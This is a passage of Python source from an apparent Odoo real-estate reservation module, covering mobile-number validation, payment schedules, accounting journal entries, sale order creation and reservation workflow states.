team_leader_ids.append(user.sale_team_id.user_id.id)\r\n for team in teams:\r\n if team.user_id.id == user.id and user.id not in team_leader_ids:\r\n team_leader_ids.append(user.id)\r\n record.team_leader_ids = user_obj.search([('id', 'in', team_leader_ids)])\r\n\r\n for team in record.sales_team_ids:\r\n if team.sales_manager_id:\r\n if team.sales_manager_id.id not in sales_manager_ids:\r\n sales_manager_ids.append(team.sales_manager_id.id)\r\n\r\n record.sales_manager_ids = user_obj.search([('id', 'in', sales_manager_ids)])\r\n\r\n @api.one\r\n def _get_company_currency(self):\r\n self.currency_id = self.env.user.company_id.currency_id\r\n\r\n @api.multi\r\n @api.depends('partner_ids')\r\n def _get_partners_name(self):\r\n for rec in self:\r\n partners_name = \"\"\r\n for partner in rec.partner_ids:\r\n if not partners_name:\r\n partners_name = partner.name\r\n else:\r\n partners_name += ' - ' + partner.name\r\n rec.partners_name = partners_name\r\n\r\n @api.constrains('mobile', 'mobile1_type')\r\n def check_mobile1_no(self):\r\n for val in self:\r\n if val.mobile and not val.mobile1_type:\r\n raise ValidationError(_(\"Sorry .. you must choose mobile 1 type !!\"))\r\n if val.mobile:\r\n mobile = val.mobile\r\n partner_obj = self.search(['|', ('mobile', '=', val.mobile), ('mobile2', '=', val.mobile)]).ids\r\n reservation_obj = self.env['rs.reservation'].search(\r\n ['&', '|', ('mobile', '=', val.mobile), ('mobile2', '=', val.mobile), '&', ('active', '=', True),\r\n ('partner_id', '=', False)])\r\n\r\n if len(mobile) != 11 and val.mobile1_type == 'local':\r\n raise ValidationError(_(\"Sorry .. mobile number must be 11 digit !!\"))\r\n\r\n if len(mobile) < 11 and val.mobile1_type == 'foreign':\r\n raise ValidationError(_(\"Sorry .. mobile number must be at least 11 digit !!\"))\r\n\r\n if not (mobile.isdigit()):\r\n raise ValidationError(_(\"Sorry .. Mobile number must contain integers only !!\"))\r\n\r\n if len(partner_obj) > 1:\r\n if val.id in partner_obj:\r\n partner_obj.remove(val.id)\r\n raise ValidationError(\r\n _('Mobile Number Already exist with customer (%s)') % self.search([('id', 'in', partner_obj)],\r\n limit=1).name)\r\n\r\n if reservation_obj:\r\n ctx = self._context\r\n if 'force_create_customer' in ctx:\r\n if not ctx['force_create_customer']:\r\n raise ValidationError(_(\"Sorry .. This mobile is already exist with active lead\"))\r\n else:\r\n raise ValidationError(_(\"Sorry .. This mobile is already exist with active lead\"))\r\n\r\n @api.constrains('mobile2', 'mobile2_type')\r\n def check_mobile2_no(self):\r\n for val in self:\r\n if val.mobile2 and not val.mobile2_type:\r\n raise ValidationError(_(\"Sorry .. you must choose mobile 2 type !!\"))\r\n if val.mobile2:\r\n mobile = val.mobile2\r\n partner_obj = self.search(['|', ('mobile', '=', val.mobile2), ('mobile2', '=', val.mobile2)]).ids\r\n reservation_obj = self.env['rs.reservation'].search(\r\n ['&', '|', ('mobile', '=', val.mobile2), ('mobile2', '=', val.mobile2), '&', ('active', '=', True),\r\n ('partner_id', '=', False)])\r\n\r\n if len(mobile) != 11 and val.mobile2_type == 'local':\r\n raise ValidationError(_(\"Sorry .. mobile number must be 11 digit !!\"))\r\n\r\n if len(mobile) < 11 and val.mobile2_type == 'foreign':\r\n raise ValidationError(_(\"Sorry .. mobile number must be at least 11 digit !!\"))\r\n\r\n if not (mobile.isdigit()):\r\n raise ValidationError(_(\"Sorry .. Mobile number must contain integers only !!\"))\r\n\r\n if len(partner_obj) > 1:\r\n if val.id in partner_obj:\r\n partner_obj.remove(val.id)\r\n raise ValidationError(\r\n _('Mobile Number Already exist with customer (%s)') % self.search([('id', 'in', partner_obj)],\r\n limit=1).name)\r\n\r\n if reservation_obj:\r\n ctx = self._context\r\n if 'force_create_customer' in ctx:\r\n if not ctx['force_create_customer']:\r\n raise ValidationError(_(\"Sorry .. This mobile is already exist with active Reservation\"))\r\n else:\r\n raise ValidationError(_(\"Sorry .. This mobile is already exist with active Reservation\"))\r\n\r\n @api.multi\r\n def check_button_salescommission_paid(self):\r\n for val in self:\r\n val.button_salescommission_paid = True\r\n\r\n @api.model\r\n def create(self, values):\r\n values['reservation_code'] = self.env['ir.sequence'].next_by_code('real.estate.reservation.id.seq')\r\n lead_id = self.env.context.get('default_lead_id')\r\n if lead_id:\r\n self.env['crm.lead'].search([('id', '=', lead_id)], limit=1).write({'active': False})\r\n return super(RsReservation, self).create(values)\r\n\r\n @api.multi\r\n def unlink(self):\r\n for record in self:\r\n if record.state in ['request_exception', 'exception_approval', 'confirm', 'in_progress', 'under_collection',\r\n 'initialize', 'review', 'create_so']:\r\n raise ValidationError(_('You must cancel reservation first.'))\r\n for property in record.unit_ids:\r\n property.write({'status': 'available'})\r\n return super(RsReservation, self).unlink()\r\n\r\n # @api.multi\r\n # @api.depends('created_date','reservation_code')\r\n # def name_get(self):\r\n # result = []\r\n # for val in self:\r\n # if val.created_date and val.reservation_code:\r\n # print val.created_date\r\n # print val.reservation_code\r\n # print val.id\r\n # created_date = dateutil.parser.parse(val.created_date).date()\r\n # name = val.reservation_code + ' - ' + str(created_date)\r\n # result.append((val.id, name))\r\n # print result,len(result)\r\n # return result\r\n\r\n def name_get(self, cr, uid, ids, context=None):\r\n res = []\r\n for record in self.browse(cr, uid, ids, context=context):\r\n name = record.reservation_code\r\n if record.created_date:\r\n created_date = dateutil.parser.parse(record.created_date).date()\r\n name = record.reservation_code + ' - ' + str(created_date)\r\n res.append((record.id, name))\r\n return res\r\n\r\n @api.multi\r\n def reservation_server_action(self):\r\n for rec in self:\r\n reservation_ids = self.env['rs.reservation'].search([])\r\n for reservation in reservation_ids:\r\n if reservation.created_date:\r\n d1 = datetime.datetime.strptime(reservation.created_date, \"%Y-%m-%d %H:%M:%S\").date()\r\n reservation_expiry = self.env['ir.values'].get_default('sky.height.settings', 'reservation_expiry')\r\n if (float_compare((datetime.date.today() - d1).days, reservation_expiry, 2) in [0,\r\n 1]) and reservation.state == 'draft':\r\n reservation.write({'state': 'cancel'})\r\n for unit in reservation.unit_ids:\r\n unit.write({'status': 'available'})\r\n\r\n @api.multi\r\n def write(self, vals):\r\n for record in self:\r\n if 'payment_strg_ids' in vals:\r\n # self._check_total_payment_amount()\r\n for payment_strg in vals['payment_strg_ids']:\r\n if len(payment_strg) >= 2 and payment_strg[0] != 0 and payment_strg[1] != 0 and type(\r\n payment_strg[2]) == dict and 'amount' in payment_strg[2]:\r\n record.is_payment_strg = True\r\n\r\n current_record = super(RsReservation, self).write(vals)\r\n user = self.env['res.users'].search([('id', '=', self.env.uid)])\r\n if len(vals) > 0 and vals.has_key('payment_strg_ids') and user.has_group('account.group_account_manager'):\r\n pass\r\n elif len(vals) > 0 and vals.has_key('payment_strg_ids') and user.has_group('account.group_account_user'):\r\n for payment in vals['payment_strg_ids']:\r\n if len(payment) == 3 and payment[2] != False:\r\n if len(payment[2]) == 1:\r\n if payment[2].has_key('journal_id'):\r\n pass\r\n else:\r\n raise ValidationError('Accountant can only edit in payment method')\r\n else:\r\n raise ValidationError('Accountant can only edit in payment method')\r\n\r\n return current_record\r\n\r\n @api.multi\r\n def copy(self, default=None):\r\n raise ValidationError(_(\"Sorry .. You Can't Duplicate The Reservation With Same Data!!\"))\r\n\r\n @api.multi\r\n @api.depends('discount', 'payment_term_discount')\r\n def _compute_total_discount(self):\r\n for record in self:\r\n record.total_discount = record.discount + record.payment_term_discount\r\n\r\n @api.multi\r\n @api.depends('discount', 'payment_term_discount', 'property_price')\r\n def _calc_net_price(self):\r\n for record in self:\r\n first_discount = record.property_price - (record.property_price * (record.payment_term_discount / 100.0))\r\n record.net_price = first_discount - (\r\n first_discount * (record.discount / 100.0))\r\n\r\n @api.multi\r\n @api.depends('created_date', 'reservation_date', 'confirm_date')\r\n def _compute_expire_dates(self):\r\n for val in self:\r\n if val.created_date:\r\n val.expire_date = (datetime.datetime.strptime(val.created_date,\r\n \"%Y-%m-%d %H:%M:%S\")) + datetime.timedelta(days=3)\r\n if val.reservation_date:\r\n val.reservation_expiry_date = (datetime.datetime.strptime(val.reservation_date, \"%Y-%m-%d %H:%M:%S\")) \\\r\n + datetime.timedelta(days=40)\r\n\r\n day1 = datetime.datetime.strptime(val.reservation_expiry_date, \"%Y-%m-%d %H:%M:%S\")\r\n day2 = datetime.datetime.now()\r\n val.expire_date_difference = (day2 - day1).days\r\n\r\n @api.constrains('pay_strategy_id', 'discount')\r\n def _check_installments(self):\r\n self._onchange_pay_strategy()\r\n old_payments = self.env['payment.strg'].search([('reserve_id', '=', False)])\r\n if old_payments:\r\n old_payments.sudo().unlink()\r\n\r\n @api.onchange('pay_strategy_id', 'discount')\r\n def _onchange_pay_strategy(self):\r\n inbound_payments = self.env['account.payment.method'].search([('payment_type', '=', 'inbound')])\r\n for rec in self:\r\n payments = []\r\n for payment in rec.payment_strg_ids:\r\n payment.write({\r\n 'reserve_id': False\r\n })\r\n if rec.pay_strategy_id and rec.pay_strategy_id.id:\r\n for payment_line in rec.pay_strategy_id.line_ids:\r\n payment_methods = inbound_payments and payment_line.journal_id.inbound_payment_method_ids or \\\r\n payment_line.journal_id.outbound_payment_method_ids\r\n if rec.created_date:\r\n date_order_format = datetime.datetime.strptime(rec.created_date, \"%Y-%m-%d %H:%M:%S\")\r\n else:\r\n date_order_format = datetime.date.today()\r\n payment_date = date_order_format\r\n if payment_line.days > 0:\r\n no_months = payment_line.days / 30\r\n date_order_day = date_order_format.day\r\n date_order_month = date_order_format.month\r\n date_order_year = date_order_format.year\r\n payment_date = date(date_order_year, date_order_month, date_order_day) + relativedelta(\r\n months=+no_months)\r\n cheque_status = 'draft'\r\n\r\n if payment_line.deposit:\r\n cheque_status = 'received'\r\n\r\n first_discount = rec.property_price - (\r\n rec.property_price * (rec.payment_term_discount / 100.0))\r\n net_price = first_discount - (\r\n first_discount * (rec.discount / 100.0))\r\n # net_price = rec.property_price - (\r\n # rec.property_price * ((rec.discount + rec.payment_term_discount)/ 100))\r\n\r\n # Todo If line is Maintenance Fee\r\n if payment_line.add_extension:\r\n payment_amount = payment_line.value_amount * rec.property_price\r\n\r\n else:\r\n payment_amount = payment_line.value_amount * net_price\r\n payment_arr = {'amount': payment_amount,\r\n 'payment_date': payment_date,\r\n 'journal_id': payment_line.journal_id.id,\r\n 'description': payment_line.payment_description,\r\n 'deposite': payment_line.deposit,\r\n 'cheque_status': cheque_status,\r\n 'add_extension': payment_line.add_extension,\r\n 'payment_method_id': payment_methods.id and payment_methods[0].id or False,\r\n 'property_ids': rec.unit_ids.ids\r\n }\r\n\r\n payments.append((0, 0, payment_arr))\r\n rec.payment_strg_ids = payments\r\n\r\n @api.multi\r\n def button_confirm_receive_checks(self):\r\n move_obj = self.env['account.move']\r\n move_line_obj = self.env['account.move.line']\r\n move_date = datetime.date.today()\r\n maintaince_move_date = datetime.date.today()\r\n maintaince = False\r\n for rec in self:\r\n if (float_compare(rec.discount, 0.0, 6) in [1]) and rec.discount_approval == False:\r\n raise ValidationError(_(\"Please Check Discount Approval\"))\r\n if rec.payment_strg_ids.ids and rec.is_payment_strg == True and rec.payment_approval == False:\r\n raise ValidationError(_(\"Please Check Payment Approval\"))\r\n if not rec.payment_attach_ids:\r\n raise ValidationError(_(\"You should attach Checks.\"))\r\n if rec.payment_attach_ids:\r\n if not any(attach.attach_type == 'checks' for attach in rec.payment_attach_ids):\r\n raise ValidationError(_(\"You should attach a File of type checks.\"))\r\n for attach in rec.payment_attach_ids:\r\n if attach.attach_type == 'checks' and attach.file_size == 0:\r\n raise ValidationError(_(\"You should attach 'Checks' file that has size.\"))\r\n if rec.payment_strg_ids:\r\n if any(payment_strg.bank_name.id == False and payment_strg.type == 'bank' for payment_strg in\r\n rec.payment_strg_ids):\r\n raise ValidationError(_(\"Installment Bank Is Missing\"))\r\n if any(payment_strg.cheque == False and payment_strg.type == 'bank' for payment_strg in\r\n rec.payment_strg_ids):\r\n raise ValidationError(_(\"Cheque Number Is Missing\"))\r\n\r\n credit_amount = 0\r\n debit_amount = 0\r\n maintaince_credit_amount = 0\r\n reservation_journal_id = self.env['ir.values'].get_default('sky.height.settings', 'reservation_journal_id')\r\n if not reservation_journal_id:\r\n raise ValidationError(_(\"Please set reservation journal from configuration.\"))\r\n reservation_journal_obj = self.env['account.journal'].browse(reservation_journal_id)\r\n maintaince_journal_id = self.env['ir.values'].get_default('sky.height.settings', 'maintaince_journal_id')\r\n if not maintaince_journal_id:\r\n raise ValidationError(_(\"Please set maintaince journal from configuration.\"))\r\n maintaince_journal_obj = self.env['account.journal'].browse(maintaince_journal_id)\r\n\r\n reservation_move_obj = move_obj.create(\r\n {'date': datetime.date.today(), 'journal_id': reservation_journal_obj.id})\r\n\r\n for pay in rec.payment_strg_ids:\r\n line_journal = pay.journal_id\r\n line_name = '/'\r\n move_date = pay.payment_date\r\n if not pay.journal_id.default_credit_account_id or not pay.journal_id.default_debit_account_id:\r\n raise ValidationError(\r\n _('Please define default credit/debit accounts on the journal \"%s\".') % (pay.journal_id.name))\r\n if not pay.journal_id.default_credit_account_id or not pay.journal_id.default_debit_account_id:\r\n raise ValidationError(\r\n _('Please define default credit/debit accounts on the journal \"%s\".') % (rec.journal_id.name))\r\n\r\n if not pay.move_check and pay.journal_id and not pay.journal_id.show_checks:\r\n pay.write({'cheque_status': 'collection', 'partner_id': rec.customer_id.id,\r\n 'property_ids': rec.unit_ids.ids})\r\n else:\r\n pay.write({'cheque_status': 'received', 'partner_id': rec.customer_id.id,\r\n 'property_ids': rec.unit_ids.ids})\r\n\r\n if pay.move_check == False and pay.journal_id.type == 'bank':\r\n if not pay.journal_id.default_credit_account_id or not pay.journal_id.default_debit_account_id:\r\n raise ValidationError(_('Please define default credit/debit accounts on the journal \"%s\".') % (\r\n pay.journal_id.name))\r\n if float_compare(pay.maintainance_fees, 0.0, 6) in [1]:\r\n maintaince = True\r\n maintaince_credit_amount += pay.maintainance_fees\r\n maintaince_move_date = pay.payment_date\r\n line_journal = maintaince_journal_obj\r\n line_name = 'maintaince'\r\n move_line_obj.with_context(check_move_validity=False).create({\r\n 'move_id': reservation_move_obj.id,\r\n 'date': datetime.date.today(),\r\n 'date_maturity': pay.payment_date,\r\n 'journal_id': pay.journal_id.id,\r\n 'account_id': line_journal.default_credit_account_id.id,\r\n 'partner_id': rec.customer_id.id,\r\n 'project_id': pay.project_id.id,\r\n 'name': line_name,\r\n 'debit': pay.maintainance_fees,\r\n 'credit': 0.0,\r\n 'amount_currency': 0.0})\r\n debit_amount = pay.amount - pay.maintainance_fees\r\n else:\r\n if pay.add_extension:\r\n line_journal = maintaince_journal_obj\r\n line_name = 'maintaince'\r\n else:\r\n line_journal = pay.journal_id\r\n line_name = '/'\r\n debit_amount = pay.amount\r\n move_line_obj.with_context(check_move_validity=False).create({\r\n 'move_id': reservation_move_obj.id,\r\n 'date': datetime.date.today(),\r\n 'date_maturity': pay.payment_date,\r\n 'journal_id': pay.journal_id.id,\r\n 'account_id': line_journal.default_credit_account_id.id,\r\n 'partner_id': rec.customer_id.id,\r\n 'project_id': pay.project_id.id,\r\n 'name': '/',\r\n 'debit': debit_amount,\r\n 'credit': 0.0,\r\n 'amount_currency': 0.0})\r\n\r\n # credit_amount += debit_amount\r\n if not pay.add_extension:\r\n credit_amount += debit_amount\r\n else:\r\n # maintaince line credit\r\n move_line_obj.with_context(check_move_validity=False).create({\r\n 'move_id': reservation_move_obj.id,\r\n 'date': datetime.date.today(),\r\n 'date_maturity': pay.payment_date,\r\n 'journal_id': line_journal.id,\r\n 'account_id': rec.customer_id.extension_account_prereceivable.id,\r\n 'partner_id': rec.customer_id.id,\r\n 'name': 'maintaince',\r\n 'credit': pay.amount,\r\n 'debit': 0.0,\r\n 'amount_currency': 0.0})\r\n if maintaince:\r\n if not rec.customer_id.extension_account_prereceivable:\r\n raise ValidationError(_('Sorry .. please set maintaince account in customer!'))\r\n move_line_obj.with_context(check_move_validity=False).create({\r\n 'move_id': reservation_move_obj.id,\r\n 'date': maintaince_move_date,\r\n 'date_maturity': datetime.date.today(),\r\n 'journal_id': maintaince_journal_obj.id,\r\n 'account_id': rec.customer_id.extension_account_prereceivable.id,\r\n 'partner_id': rec.customer_id.id,\r\n 'name': 'maintaince',\r\n 'credit': maintaince_credit_amount,\r\n 'debit': 0.0,\r\n 'amount_currency': 0.0})\r\n if not rec.customer_id.property_unearned_revenu_account_prereceivable:\r\n raise ValidationError(_(\"Sorry .. set unearned revenue account in customer!\"))\r\n\r\n move_line_obj.with_context(check_move_validity=False).create({\r\n 'move_id': reservation_move_obj.id,\r\n 'date': datetime.date.today(),\r\n 'date_maturity': move_date,\r\n 'journal_id': reservation_journal_obj.id,\r\n 'account_id': rec.customer_id.property_unearned_revenu_account_prereceivable.id,\r\n 'partner_id': rec.customer_id.id,\r\n 'name': 'customer payment',\r\n 'credit': credit_amount,\r\n 'debit': 0.0,\r\n 'amount_currency': 0.0})\r\n reservation_move_obj.journal_id = reservation_journal_obj.id\r\n reservation_move_obj.post()\r\n if rec.state == 'in_progress':\r\n rec.write({'receive_checks': True, 'state': 'confirm'})\r\n if rec.state == 'initialize':\r\n rec.write({'receive_checks': True})\r\n return rec.write(\r\n {'receive_checks_journal_entry_id': reservation_move_obj.id, 'confirm_date': datetime.date.today(),\r\n 'confirm_user_id': self.env.user.id})\r\n\r\n @api.multi\r\n def create_sale_order(self):\r\n for val in self:\r\n\r\n sale_order_pool = self.env['sale.order']\r\n sale_order_line_pool = self.env['sale.order.line']\r\n\r\n if (float_compare(val.discount, 0.0, 6) in [1]) and val.discount_approval == False:\r\n raise ValidationError(_(\"Please Check Discount Approval\"))\r\n if val.payment_strg_ids.ids and val.is_payment_strg == True and val.payment_approval == False:\r\n raise ValidationError(_(\"Please Check Payment Approval\"))\r\n\r\n if not val.payment_attach_ids:\r\n raise ValidationError(_(\"You should attach signature .\"))\r\n if val.payment_attach_ids:\r\n if not any(attach.attach_type == 'signature' for attach in val.payment_attach_ids):\r\n raise ValidationError(_(\"You should attach a File of type signature.\"))\r\n for attach in val.payment_attach_ids:\r\n if attach.attach_type == 'signature' and attach.file_size == 0:\r\n raise ValidationError(_(\"You should attach 'Signature' file that has size.\"))\r\n\r\n # Create Sale Order\r\n vals = {}\r\n payments = []\r\n for payment_line in val.payment_strg_ids:\r\n payments.append((0, _, {'amount': payment_line.amount,\r\n 'payment_date': payment_line.payment_date,\r\n 'journal_id': payment_line.journal_id.id,\r\n 'bank_name': payment_line.bank_name.id,\r\n 'cheque': payment_line.cheque,\r\n 'move_check': payment_line.move_check,\r\n 'description': payment_line.description,\r\n 'cus_bank': payment_line.cus_bank.id,\r\n 'type': payment_line.type,\r\n 'payment_id': payment_line.payment_id.id,\r\n\r\n }))\r\n\r\n vals.update({'partner_id': val.customer_id.id,\r\n 'conditions': val.conditions,\r\n 'payment_term_id': val.pay_strategy_id.id,\r\n 'state': 'draft',\r\n 'pricelist_id': val.customer_id.property_product_pricelist.id,\r\n 'partner_invoice_id': val.customer_id.id,\r\n 'partner_shipping_id': val.customer_id.id,\r\n 'date_order': datetime.date.today(),\r\n 'order_policy': 'manual',\r\n 'company_id': val.customer_id.company_id.id,\r\n 'reservation_id': val.id,\r\n 'origin': val.name,\r\n 'fiscal_position': '1',\r\n 'payment_strg_ids': payments,\r\n\r\n })\r\n\r\n sale_id = sale_order_pool.create(vals)\r\n\r\n order_lines = {}\r\n for unit in val.unit_ids:\r\n order_lines.update(({'order_id': sale_id.id,\r\n 'product_id': unit.id,\r\n 'name': 'yttt',\r\n 'product_uom_qty': '1',\r\n 'price_unit': val.net_price,\r\n 'state': 'draft',\r\n 'company_id': '1',\r\n\r\n }))\r\n sale_order_line_pool.create(order_lines)\r\n val.lead_id.action_set_won()\r\n sale_id.action_done()\r\n unit.write({'status': 'contracted'})\r\n val.write({'state': 'create_so', 'sale_order_id': sale_id.id, 'contract_user_id': val.env.user.id})\r\n return True\r\n\r\n @api.multi\r\n def button_request_exception(self):\r\n for val in self:\r\n if (float_compare(val.discount, 0.0, 6) in [1]) and val.discount_approval == False:\r\n raise ValidationError(_(\"Please Check Discount Approval\"))\r\n if val.payment_strg_ids.ids and val.is_payment_strg == True and val.payment_approval == False:\r\n raise ValidationError(_(\"Please Check Payment Approval\"))\r\n if not val.request_exception:\r\n raise ValidationError(_('You Must Enter Exception Request'))\r\n return val.write({'state': 'request_exception', 'request_user_id': self.env.user.id})\r\n\r\n @api.multi\r\n def button_exception_approval(self):\r\n for val in self:\r\n if (float_compare(val.discount, 0.0, 6) in [1]) and val.discount_approval == False:\r\n raise ValidationError(_(\"Please Check Discount Approval\"))\r\n if val.payment_strg_ids.ids and val.is_payment_strg == True and val.payment_approval == False:\r\n raise ValidationError(_(\"Please Check Payment Approval\"))\r\n return val.write({'state': 'exception_approval', 'exception_approval_user_id': self.env.user.id})\r\n\r\n @api.multi\r\n def button_exception_rejection(self):\r\n for val in self:\r\n if (float_compare(val.discount, 0.0, 6) in [1]) and val.discount_approval == False:\r\n raise ValidationError(_(\"Please Check Discount Approval\"))\r\n if val.payment_strg_ids.ids and val.is_payment_strg == True and val.payment_approval == False:\r\n raise ValidationError(_(\"Please Check Payment Approval\"))\r\n\r\n return val.write({'state': 'draft', 'exception_rejection_user_id': self.env.user.id})\r\n\r\n @api.multi\r\n def button_initialize(self):\r\n for rec in self:\r\n if (float_compare(rec.discount, 0.0, 6) in [1]) and rec.discount_approval == False:\r\n raise ValidationError(_(\"Please Check Discount Approval\"))\r\n if rec.payment_strg_ids.ids and rec.is_payment_strg == True and rec.payment_approval == False:\r\n raise ValidationError(_(\"Please Check Payment Approval\"))\r\n if not rec.id_no:\r\n raise ValidationError(_('You Must Choose Id No.'))\r\n if not rec.id_type:\r\n raise ValidationError(_('You Must Choose ID Type'))\r\n if not rec.id_photo:\r\n raise ValidationError(_('You Must Choose Photo ID'))\r\n if not rec.attach_ids:\r\n raise ValidationError(_(\"You should attach legal papers.\"))\r\n if rec.attach_ids:\r\n if not any(attach.legal_type == 'legal1' for attach in rec.attach_ids):\r\n raise ValidationError(_(\"You should Select Legal Attachment 1 Type.\"))\r\n for attach in rec.attach_ids:\r\n if attach.legal_type == 'legal1' and attach.file_size == 0:\r\n raise ValidationError(_(\"You should attach 'Legal 1' file that has size.\"))\r\n\r\n return rec.write({'state': 'initialize', 'initialize_user_id': self.env.user.id, 'initalized_check': True})\r\n\r\n @api.multi\r\n def under_collection_check(self):\r\n account_move_obj = self.env['account.move']\r\n account_move_line_obj = self.env['account.move.line']\r\n maintaince = False\r\n for rec in self:\r\n credit_amount = 0\r\n debit_amount = 0\r\n maintaince_credit_amount = 0\r\n under_collection_journal_id = self.env['ir.values'].get_default('sky.height.settings',\r\n 'under_collection_journal_id')\r\n if (float_compare(rec.discount, 0.0, 6) in [1]) and rec.discount_approval == False:\r\n raise ValidationError(_(\"Please Check Discount Approval\"))\r\n if rec.payment_strg_ids.ids and rec.is_payment_strg == True and rec.payment_approval == False:\r\n raise ValidationError(_(\"Please Check Payment Approval\"))\r\n if not under_collection_journal_id:\r\n raise ValidationError(_(\"Please set under collection journal from skyheights configuration.\"))\r\n under_collection_journal_obj = self.env['account.journal'].browse(under_collection_journal_id)\r\n under_collection_move_obj = account_move_obj.create(\r\n {'date': datetime.date.today(), 'journal_id': under_collection_journal_obj.id})\r\n maintaince_journal_id = self.env['ir.values'].get_default('sky.height.settings', 'maintaince_journal_id')\r\n if not maintaince_journal_id:\r\n raise ValidationError(_(\"Please set maintaince journal from configuration.\"))\r\n maintaince_journal_obj = self.env['account.journal'].browse(maintaince_journal_id)\r\n if maintaince_journal_obj and not maintaince_journal_obj.under_collected_account_id:\r\n raise ValidationError(_(\"Please set undercollection account in maintaince journal from configuration.\"))\r\n for pay in rec.payment_strg_ids:\r\n if not pay.journal_id.default_credit_account_id or not pay.journal_id.default_debit_account_id:\r\n raise ValidationError(\r\n _('Please define default credit/debit accounts on the journal \"%s\".') % (rec.journal_id.name))\r\n if pay.deposite == False:\r\n pay.write({'cheque_status': 'under_collection',\r\n 'under_collected_journal_entry_id': under_collection_move_obj.id})\r\n if float_compare(pay.maintainance_fees, 0.0, 6) in [1]:\r\n maintaince = True\r\n maintaince_credit_amount += pay.maintainance_fees\r\n account_move_line_obj.with_context(check_move_validity=False).create({\r\n 'move_id': under_collection_move_obj.id,\r\n 'date': datetime.date.today(),\r\n 'date_maturity': pay.payment_date,\r\n 'journal_id': pay.journal_id.id,\r\n 'account_id': maintaince_journal_obj.under_collected_account_id.id,\r\n 'partner_id': rec.customer_id.id,\r\n 'project_id': pay.project_id.id,\r\n 'name': 'under collection maintaince',\r\n 'debit': pay.maintainance_fees,\r\n 'credit': 0.0,\r\n 'amount_currency': 0.0})\r\n debit_amount = pay.amount - pay.maintainance_fees\r\n elif pay.add_extension:\r\n maintaince = True\r\n maintaince_credit_amount += pay.amount\r\n account_move_line_obj.with_context(check_move_validity=False).create({\r\n 'move_id': under_collection_move_obj.id,\r\n 'date': datetime.date.today(),\r\n 'date_maturity': pay.payment_date,\r\n 'journal_id': pay.journal_id.id,\r\n 'account_id': maintaince_journal_obj.under_collected_account_id.id,\r\n 'partner_id': rec.customer_id.id,\r\n 'project_id': pay.project_id.id,\r\n 'name': 'under collection maintaince',\r\n 'debit': pay.amount,\r\n 'credit': 0.0,\r\n 'amount_currency': 0.0})\r\n debit_amount = pay.amount - pay.amount\r\n else:\r\n debit_amount = pay.amount\r\n\r\n credit_amount += debit_amount\r\n if debit_amount != 0.0:\r\n account_move_line_obj.with_context(check_move_validity=False).create({\r\n 'move_id': under_collection_move_obj.id,\r\n 'date': datetime.date.today(),\r\n 'date_maturity': pay.payment_date,\r\n 'journal_id': pay.journal_id.id,\r\n 'account_id': pay.journal_id.under_collected_account_id.id,\r\n 'partner_id': rec.customer_id.id,\r\n 'project_id': pay.project_id.id,\r\n 'name': pay.description,\r\n 'debit': debit_amount,\r\n 'credit': 0.0,\r\n 'amount_currency': 0.0\r\n })\r\n\r\n if maintaince and maintaince_credit_amount != 0.0:\r\n account_move_line_obj.with_context(check_move_validity=False).create({\r\n 'move_id': under_collection_move_obj.id,\r\n 'date': datetime.date.today(),\r\n 'date_maturity': pay.payment_date,\r\n 'journal_id': pay.journal_id.id,\r\n 'account_id': maintaince_journal_obj.default_credit_account_id.id,\r\n 'partner_id': rec.customer_id.id,\r\n 'name': 'under collection maintaince',\r\n 'credit': maintaince_credit_amount,\r\n 'debit': 0.0,\r\n 'amount_currency': 0.0})\r\n account_move_line_obj.with_context(check_move_validity=False).create({\r\n 'move_id': under_collection_move_obj.id,\r\n 'date': datetime.date.today(),\r\n 'date_maturity': pay.payment_date,\r\n 'journal_id': pay.journal_id.id,\r\n 'account_id': pay.journal_id.default_credit_account_id.id,\r\n 'partner_id': rec.customer_id.id,\r\n 'name': 'Under Collection ',\r\n 'credit': credit_amount,\r\n 'debit': 0.0,\r\n 'amount_currency': 0.0,\r\n\r\n })\r\n under_collection_move_obj.journal_id = under_collection_journal_obj.id\r\n under_collection_move_obj.post()\r\n rec.write({'state': 'under_collection', 'undercollection_check': True,\r\n 'under_collection__journal_entry_id': under_collection_move_obj.id})\r\n\r\n @api.multi\r\n def button_review(self):\r\n for rec in self:\r\n if (float_compare(rec.discount, 0.0, 6) in [1]) and rec.discount_approval == False:\r\n raise ValidationError(_(\"Please Check Discount Approval\"))\r\n if rec.payment_strg_ids.ids and rec.is_payment_strg == True and rec.payment_approval == False:\r\n raise ValidationError(_(\"Please Check Payment Approval\"))\r\n if not any(attach.legal_type == 'legal2' for attach in rec.attach_ids):\r\n raise ValidationError(_(\"You should Select Legal Attachment 2 Type.\"))\r\n for attach in rec.attach_ids:\r\n if attach.legal_type == 'legal2' and attach.file_size == 0:\r\n raise ValidationError(_(\"You should attach 'Legal 2' file that has size.\"))\r\n return rec.write({'state': 'review', 'review_user_id': self.env.user.id, 'reviewed_check': True})\r\n\r\n @api.multi\r\n def button_in_progress(self):\r\n for rec in self:\r\n user = self.env['res.users'].browse(self.env.uid)\r\n\r\n # Check if properties in reservation request are still available or not\r\n if (any(True for each_unit in rec.unit_ids if each_unit.status != 'available')):\r\n raise ValidationError(_(\"One or more of selected properties are not available\"))\r\n\r\n if rec.discount and rec.discount_approval == False:\r\n raise ValidationError(_(\"Please Check Discount Approval\"))\r\n if rec.payment_strg_ids.ids and rec.is_payment_strg == True and rec.payment_approval == False:\r\n raise ValidationError(_(\"Please Check Payment Approval\"))\r\n if not rec.customer_id:\r\n raise ValidationError(_('You Must Choose Customer'))\r\n if not rec.pay_strategy_id:\r\n raise ValidationError(_('You Must Choose Payment Strategy'))\r\n\r\n if rec.payment_strg_ids:\r\n for pay in rec.payment_strg_ids:\r\n if pay.deposite == True:\r\n if not pay.move_id:\r\n raise ValidationError(_('All Deposits Amount Must Be Paid'))\r\n\r\n if not rec.payment_attach_ids:\r\n raise ValidationError(_(\"You should attach Deposit Papers.\"))\r\n if rec.payment_attach_ids:\r\n if not any(attach.attach_type == 'deposit' for attach in rec.payment_attach_ids):\r\n raise ValidationError(_(\"You should attach a File of type deposit.\"))\r\n if not any(attach.attach_type == 'signature' for attach in rec.payment_attach_ids):\r\n raise ValidationError(_(\"You should attach a File of type signature.\"))\r\n for attach in rec.payment_attach_ids:\r\n if attach.attach_type == 'deposit' and attach.file_size == 0:\r\n raise ValidationError(_(\"You should attach 'Deposit' file that has size.\"))\r\n\r\n for unit in rec.unit_ids:\r\n unit.write({'status': 'reserved'})\r\n rec.sudo().write({'state': 'in_progress',\r\n 'reservation_date': datetime.date.today(),\r\n 'in_progress_user_id': self.env.user.id})\r\n if user.has_group('isky_access_rights.group_ar'):\r\n return {\r\n 'view_type': 'form',\r\n 'view_mode': 'tree',\r\n 'res_model': 